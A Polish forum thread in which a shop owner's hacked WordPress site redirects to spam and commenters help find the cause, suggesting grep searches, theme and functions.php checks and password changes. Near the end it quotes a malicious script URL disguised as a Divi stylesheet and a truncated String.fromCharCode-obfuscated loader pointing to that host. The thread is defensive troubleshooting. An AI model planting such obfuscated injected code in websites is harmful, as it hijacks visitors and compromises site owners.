Mirki, mam problem. #programowanie #sieci #hacking #wordpress Mam sobie mały sklep internetowy i codziennie coś tam na nim sobie robie, to nowe produkty to coś innego. Swierdziłem ze chce SSL, i kupiłem. To było 2 tygodnie temu i wszystko kryształ, działa. Dizisja wchodze i strona jest przekierowywana na jakiś szit, sprawdzałem już wszystkie htaacces, nigdzie nie widać śladu przekierowania, sprawdzałem wszystkie wp-header'y, index.php i nigdzie nie widze czegoś co może być w jakimkolwiek stopniu powiązane z tymi przekierowywaniami.
Usunałem przez FTP wszystkie pluginy, lecz też bez zmian. Domene mam na ovh - jeszcze mi nie odpisali Hosting mam na linuxpl.com - odpisali, wrzucili mi backup. Ale bez zmian. Nie wiem czy mam sie poddać czy co robić z tym już.
@WydajnaJednostkaIndywidualna: nie, nie multi :D 2. zaraz to zrobie 3.nie wiem jak to zrobić 4.Sprawdziłem już, czysto 5. htaccess - czyste wszystkie które sprawdzałem 6. bo była promocja ( ͡°͜ʖ͡°)
@Socyn: Nie mam pojęcia. Weźcie użyjcie grep -iR szukanadomena na swoim kodzie i zobaczcie co i gdzie wam dołączyło skrypty z tej domeny. Oczywiście nie dam głowy, że nie ma tego w treści jakiegoś komentarza czy innego contentu od strony użytkownika. Wtedy szukajcie w bazie.
@RazYouDude: Generalnie to obstawiam JS w motywie/pluginie lub niemiłe dodatki functions.php. Tytuł i wszystko są pobierane z bazy i renderowane i w momencie renderowania motywu jest przekierowanie.
@dokad_idziesz: nie będzie tej domeny ;) ogarnięty ktoś je pisał, szukajcie czegoś takiego (liczby będą inne, trza by sprawdzić na tablice kodów charów i będzie do tego mytemapltewebsite
@RazYouDude: Teraz jest już zapóźno na wyrzucanie :P Zobacz czy nie masz nowych użytkowników w WP. Plus tak jak @dokad_idziesz, trzeba przetrzepać wszystkie pliki *js. Popatrz też na wszystkie pliki pod katem daty modyfikacji.
#programowanie #sieci #hacking #wordpress
Mam sobie mały sklep internetowy i codziennie coś tam na nim sobie robie, to nowe produkty to coś innego.
Swierdziłem ze chce SSL, i kupiłem. To było 2 tygodnie temu i wszystko kryształ, działa.
Dizisja wchodze i strona jest przekierowywana na jakiś szit, sprawdzałem już wszystkie htaacces, nigdzie nie widać śladu przekierowania, sprawdzałem wszystkie wp-header'y, index.php i nigdzie nie widze czegoś co może być w jakimkolwiek stopniu powiązane z tymi przekierowywaniami.
Usunałem przez FTP wszystkie pluginy, lecz też bez zmian.
Domene mam na ovh - jeszcze mi nie odpisali
Hosting mam na linuxpl.com - odpisali, wrzucili mi backup. Ale bez zmian.
Nie wiem czy mam sie poddać czy co robić z tym już.
Strona: www.kajet.art
Obstawiam obfuskowany eval i inne świństwa gdzieś w plikach lub JS.
Po 1. zmień hasła bo jak się #!$%@? raz, to wjebią się kolejny.
Po 2. od nowa
Komentarz usunięty przez autora
2. zaraz to zrobie
3.nie wiem jak to zrobić
4.Sprawdziłem już, czysto
5. htaccess - czyste wszystkie które sprawdzałem
6. bo była promocja ( ͡° ͜ʖ ͡°)
@371t3: Miałem go zainstalowanego, jego pierwszego wyrzuciłem, ale nic nie pomogło
grep -iR szukanadomenana swoim kodzie i zobaczcie co i gdzie wam dołączyło skrypty z tej domeny. Oczywiście nie dam głowy, że nie ma tego w treści jakiegoś komentarza czy innego contentu od strony użytkownika. Wtedy szukajcie w bazie.Sprawdź też footer.php to też lubią używać.
źródło: comment_NUiTUyIukqBqTRiRQA6ncZJlt5fmUKPR.jpg
Pobierzhttps://mytemplatewebsite.com/0.js?/wp-content/themes/Divi/style_css&ver=3.17.6
var lt = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 109, 121, 116, 101, 109, 112, 108, 97, 116, 101, 119, 101, 98, 115, 105, 116, 101, 46, 99, 111, 109, 47, 102, 46, 112, 104,
Komentarz usunięty przez autora